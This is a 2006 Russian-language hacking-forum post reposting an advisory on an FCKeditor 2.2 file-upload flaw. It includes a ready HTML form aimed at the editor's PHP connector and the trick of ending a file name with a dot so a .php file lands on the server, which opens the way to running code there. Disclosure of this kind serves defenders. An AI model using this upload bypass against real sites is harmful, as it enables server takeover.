ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Уязвимость в FCKeditor 2.2
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимость в FCKeditor 2.2
  #1  
Старый 27.02.2006, 13:50
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


Exclamation Уязвимость в FCKeditor 2.2
Что-то новость прошла незамеченной...

Исследование: NSA Group
Продукт: FCKeditor 2.2
Сайт производителя: http://www.fckeditor.net

Описание:
Возможен обход фильтрации расширений файлов.

Воздействие:
Загрузка запрещённых файлов на целевую систему.

Риск: высокий

Пример:
Код:
<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data"> 
File Upload:
<input id="txtFileUpload" type="file" name="NewFile"> 
<input type="submit" value="Upload"> 
</form>
В конце имени загружаемого файла поставеть символ "." (пример: testfile.php.)

В результате на сервере будет создан файл testfile.php

Решение:
Обратиться на сайт производителя http://www.fckeditor.net
---
Источник: http://www.nsag.ru/vuln/893.html
__________________
+ (это не крестик, это плюсик!)
__________________
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимость WMF- просто очередная недоработка программного кода Windows dinar_007 Мировые новости 0 19.01.2006 03:26
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Форумы 2 24.12.2005 17:28
Уязвимость WZC в Windows XP DRON-ANARCHY Мировые новости 5 10.10.2005 23:16
Очередная уязвимость в браузре Internet Explorer DRON-ANARCHY Мировые новости 0 02.10.2005 22:28
Открытие файлов и внешние данные. Потенциальная уязвимость php-скриптов k00p3r Чужие Статьи 1 11.07.2005 19:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ